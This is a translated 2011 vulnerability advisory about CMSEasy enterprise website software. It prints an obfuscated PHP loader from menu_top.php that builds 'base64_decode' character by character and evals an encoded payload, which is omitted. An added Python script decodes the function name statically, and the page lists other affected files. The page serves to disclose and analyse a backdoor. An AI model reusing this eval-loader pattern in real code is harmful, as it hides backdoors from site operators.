Easy Pass enterprise website: latest 0DAY vulnerability - vulnerability warning - the black bar safety net

2011-06-28T00:00:00
ID MYHACK58:62201131065
Type myhack58
Reporter Anonymous
Modified 2011-06-28T00:00:00

Description

The Easy Pass enterprise website system, also known as the Easy Pass enterprise web application, is developed by the Easy Pass company and is described as China's first marketing-oriented enterprise website management system to provide free corporate website templates. The system's front end generates HTML and is fully SEO-compliant, and it also offers online customer service, potential-customer tracking, easy website template creation, search engine promotion and other functions.

Official website: http://www.cmseasy.cn/

The vulnerability appears in the file menu_top.php; see the code:

<?php // Copyright(C) 2009-2011 www.cmseasy.cn, All rights reserved.

$OOO0O0O00=__FILE__;
$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');
$OO00O0000=92;
// The next three statements pick characters out of the decoded string to spell "base64_decode".
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$O0O0000O0='OOO0000O0';
// $$O0O0000O0 is a variable variable, so the call below is eval(base64_decode('...')).
eval(($$O0O0000O0('[base64-encoded payload omitted]')));return;?>


I am not very good at PHP analysis; the website also has this vulnerability.
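The loader stub at the top of menu_top.php spells out the name of the function it hands the encoded payload to, one character at a time. The following added example (not part of the original advisory and not the vendor's code) resolves that name statically, without executing any PHP. The names `resolve_stub` and `eval_callee` are hypothetical, and the stub is copied from the page with extraction spaces removed and the payload left out.

```python
import re
from urllib.parse import unquote

# Loader stub from menu_top.php as shown on this page, with the spaces introduced
# by extraction removed. The base64 payload is omitted: it is not needed here.
STUB = (
    "$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f"
    "%73%61%64%66%70%6e%72');"
    "$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};"
    "$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};"
    "$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}"
    ".$OOO0000O0{7}.$OOO000000{5};"
    "$O0O0000O0='OOO0000O0';"
)

ASSIGN = re.compile(r"\$(\w+)\s*(\.?=)\s*([^;]+);")   # $name = expr;  or  $name .= expr;
TERM = re.compile(r"\$(\w+)\{(\d+)\}")                # $name{index}

def resolve_stub(php):
    """Evaluate only string assignments built from urldecode() and $var{n} lookups."""
    env = {}
    for name, op, expr in ASSIGN.findall(php):
        expr = expr.strip()
        decoded = re.fullmatch(r"urldecode\('([^']*)'\)", expr)
        if decoded:
            value = unquote(decoded.group(1))
        elif re.fullmatch(r"'[^']*'", expr):
            value = expr[1:-1]
        else:
            terms = [TERM.fullmatch(p.strip()) for p in expr.split(".")]
            if not all(terms):
                continue  # eval(), __FILE__, numbers: never interpreted
            # Lookups read the variable's value *before* this assignment lands.
            value = "".join(env[t.group(1)][int(t.group(2))] for t in terms)
        env[name] = env.get(name, "") + value if op == ".=" else value
    return env

def eval_callee(php):
    """Name of the function that eval(($$O0O0000O0(...))) actually calls."""
    env = resolve_stub(php)
    return env[env["O0O0000O0"]]  # $$var is a PHP variable variable

if __name__ == "__main__":
    print(eval_callee(STUB))
```
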

There are many paths...

lib/mods/celive/menu_top.php

lib/default/ballot_act.php

lib/default/special_act.php